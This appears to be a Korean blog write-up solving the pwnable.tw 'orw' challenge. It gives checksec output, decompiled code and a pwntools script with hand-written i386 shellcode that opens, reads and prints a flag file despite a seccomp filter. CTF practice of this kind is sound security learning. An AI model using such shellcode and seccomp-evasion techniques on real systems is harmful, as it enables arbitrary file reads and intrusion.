checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
description
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);
(shellcode)();
return 0;
}
쉘코드를 받고 실행시켜 줍니다
seccomp이 걸려있어 rule을 확인해보면 open, read, write이 열려 있어서 문제 이름처럼 orw 쉘코드 작성해주면 됩니다
exploit code
from pwn import *
p = remote("chall.pwnable.tw", 10001)
ru = lambda a : p.recvuntil(a)
sc = b"\xb8\x03\x00\x00\x00"
sc += b"\xbb\x00\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x0f\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\xbb\x00\xa1\x04\x08"
sc += b"\xb8\x05\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\x89\xc3"
sc += b"\xb8\x03\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x50\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\xb8\x04\x00\x00\x00"
sc += b"\xbb\x01\x00\x00\x00"
sc += b"\xb9\x00\xa1\x04\x08"
sc += b"\xba\x50\x00\x00\x00"
sc += b"\xcd\x80"
sc += b"\x90" * (200 - len(sc))
ru(b":")
p.send(sc)
sleep(0.1)
p.send(b"/home/orw/flag\x00")
p.interactive()'pwn > pwnable.tw' 카테고리의 다른 글
| [pwnable.tw] hacknote (1) | 2024.01.08 |
|---|---|
| [pwnable.tw] dubble sort (1) | 2024.01.08 |
| [pwnable.tw] 3x17 (1) | 2024.01.07 |
| [pwnable.tw] calc (1) | 2024.01.07 |
| [pwnable.tw] start (2) | 2024.01.04 |